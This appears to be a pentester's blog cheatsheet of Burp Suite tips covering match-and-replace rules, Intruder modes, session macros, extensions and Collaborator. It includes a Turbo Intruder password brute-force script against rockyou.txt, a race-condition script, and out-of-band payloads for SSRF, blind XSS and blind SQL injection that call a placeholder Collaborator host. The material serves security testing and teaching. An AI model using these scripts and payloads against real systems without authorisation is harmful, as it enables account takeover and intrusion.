← Back to writing
Tools & Cheatsheets

Burp Suite Tips & Tricks

Apr 20, 2024
5 min read
lawbyte

Most people use Burp Suite at about 20% of its capability. This post covers the features that actually speed up web pentesting — Match & Replace rules, macros for authenticated scanning, Turbo Intruder for high-speed fuzzing, and the extensions worth installing.

Match & Replace Rules

Proxy → Options → Match and Replace

These apply automatically to every request/response in scope. Set them up once, forget about them.

Always useful rules

Type Match Replace Use
Request header ^User-Agent.* Mozilla/5.0 (X11; Linux x86_64) Normalize UA
Response header X-Frame-Options:.* `` Enable clickjacking test
Response header Content-Security-Policy:.* `` Strip CSP for XSS testing
Response body "is_admin":false "is_admin":true Test admin features
Request header ^ X-Forwarded-For: 127.0.0.1 IP spoofing

Add headers to all requests

Match: ^ (beginning of headers, regex mode)
Replace: X-Custom-Header: value\r\n

Scope Configuration

Set scope early — it prevents Burp from logging noise and Scanner/Extensions only target in-scope items.

Target → Scope → Add:
Protocol: https
Host: *.target.com
File: .*

# Or import from OpenAPI spec
Target → Import → OpenAPI

Show only in-scope items in Proxy:

Proxy → Options → Intercept Client Requests → check “And URL is in target scope”

Repeater Shortcuts

Shortcut Action
Ctrl+R Send request to Repeater
Ctrl+Shift+R Switch to Repeater
Ctrl+Space Send request
Ctrl+Z Undo
Ctrl+↑/↓ Navigate through request history
Ctrl+G Go to line
Ctrl+F Find in request/response

Right-click → Change request method — instantly convert GET to POST and vice versa with parameter migration.

Intruder Modes

Sniper — one payload list, injected into each position in turn. Good for fuzzing individual parameters.

Battering Ram — same payload list, injected into all positions simultaneously. Good for login brute-force where username=password.

Pitchfork — multiple lists, each matched to a position by index. Good for credential stuffing (username list + corresponding password list).

Cluster Bomb — multiple lists, all combinations. Good for brute-forcing when you don’t know which username/password pairs go together.

Turbo Intruder

Much faster than Intruder for high-request attacks. Uses HTTP/2 and pipelining.

Extensions → BApp Store → Turbo Intruder

# Basic password brute force
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30,
                          requestsPerConnection=100,
                          pipeline=False)
    
    for password in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, password.rstrip())

def handleResponse(req, interesting):
    if req.status == 302 or 'Welcome' in req.response:
        table.add(req)
# Race condition — send N requests at exact same time
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          requestsPerConnection=100,
                          pipeline=True)
    
    for i in range(20):
        engine.queue(target.req, gate='race1')
    
    engine.openGate('race1')  # fire all at once

def handleResponse(req, interesting):
    table.add(req)

Session Handling Macros

For testing authenticated endpoints, set up a macro to automatically re-authenticate when the session expires.

Project Options → Sessions → Session Handling Rules → Add

  1. Rule action: Run a macro
  2. Macro: Record a login sequence
    • Proxy → History → select login requests
    • Right-click → “Add to macro”
  3. Scope: Apply to Intruder, Scanner, Repeater

Example macro: GET /login-page → extract CSRF token → POST /login with creds + token → extract new session cookie → inject into subsequent requests.

CSRF Token Extraction in Macros

When the app has CSRF tokens:

  1. Project Options → Sessions → Macros → Add
  2. Record: GET /page-with-form (captures CSRF token)
  3. Click “Configure item” on the GET request
  4. Custom parameter locations: extract csrf_token from response body
  5. In the POST request, reference ¶csrf_token¶

Useful Extensions (BApp Store)

Extension Use
Autorize Automatically tests for BOLA/IDOR — replays all requests with a lower-privilege token
JWT Editor JWT decode, modify, sign with custom keys, attack flows
InQL GraphQL introspection, query editor, IDOR testing
Param Miner Discovers hidden parameters via wordlist and header guessing
HTTP Request Smuggler Detects and exploits HTTP request smuggling
Turbo Intruder High-speed fuzzing with Python
Active Scan++ Extends Scanner with additional checks
Retire.js Identifies vulnerable JavaScript libraries
Logger++ Advanced logging with filters and search
Hackvertor In-editor encoding/decoding and transformations
SQLiPy SQLMap integration — send from Repeater
Wsdler WSDL parser for SOAP web service testing

Autorize — BOLA Testing

One of the most valuable extensions for API testing.

  1. Log in as User A (higher privilege), note all endpoints.
  2. Log in as User B (lower privilege), copy session cookie.
  3. Open Autorize → paste User B’s cookie.
  4. Browse as User A — Autorize automatically replays every request as User B.
  5. Green = User B can’t access. Red = BOLA confirmed.

Scanner Configuration

Dashboard → New Scan → Audit

For faster scans, customize the audit configuration:

  • Audit optimization: Balance between accuracy and speed
  • Handling application errors: Check “Ignore application errors after N consecutive errors”
  • Issues to detect: Uncheck low-value checks (banner grabbing, etc.)
  • Insertion points: Specify which parameter types to fuzz

Crawl + Audit configuration:

  • Login macros for authenticated crawl
  • Max crawl depth to avoid infinite loops
  • Custom error page detection

HTTP History Filtering

Proxy → HTTP History:

Filter by:
- Show only in-scope items
- Filter by MIME type (e.g., only JSON)
- Search by request/response content
- Filter by response code (e.g., 2xx, 4xx)

# Quick column sort:
Click "Method" column → shows all POSTs together
Click "Status" columngroups by response code

Useful Keyboard Shortcuts

Shortcut Action
Ctrl+Shift+D Send to Decoder
Ctrl+Shift+C Send to Comparer
Ctrl+Shift+I Send to Intruder
Ctrl+R Send to Repeater
Ctrl+A Select all text in editor
Ctrl+U URL encode selection
Ctrl+Shift+U URL decode selection
Ctrl+H HTML encode/decode
Ctrl+B Base64 encode
Ctrl+Shift+B Base64 decode

Collaborator Tricks

Burp Collaborator provides out-of-band HTTP/DNS/SMTP callbacks.

# Use in payloads wherever you need OOB interaction:
https://YOUR_COLLAB_ID.burpcollaborator.net

# SSRF detection
?url=https://YOUR_COLLAB_ID.burpcollaborator.net

# Blind XSS
<script src="//YOUR_COLLAB_ID.burpcollaborator.net/xss.js"></script>

# Blind SQLi
'; EXEC xp_dirtree '\\YOUR_COLLAB_ID.burpcollaborator.net\x'--

# Check Collaborator tab for incoming interactions

Project-Level Config Worth Saving

// Project Options → Misc → Scheduled Tasks
// Auto-save project every 5 minutes

// SSL Pass-Through — for hosts that break Burp interception
// Proxy → Options → SSL Pass Through
// Add: specific host that handles its own pinning

Always export project config after setting up scope, macros, and match/replace rules:

Project → Save project → gives you a .burp file with all settings intact.

#burp #cheatsheet #web #proxy
Author lawbyte
Link https://lbyte.id/2024/04/20/tools/web/burp-suite-tips-tricks/
License CC BY-NC-SA 4.0
← Previous Server-Side Template Injection (SSTI) Next → XXE Injection Attacks

Discussion

Leave a comment · All fields required · No spam

No comments yet. Be the first.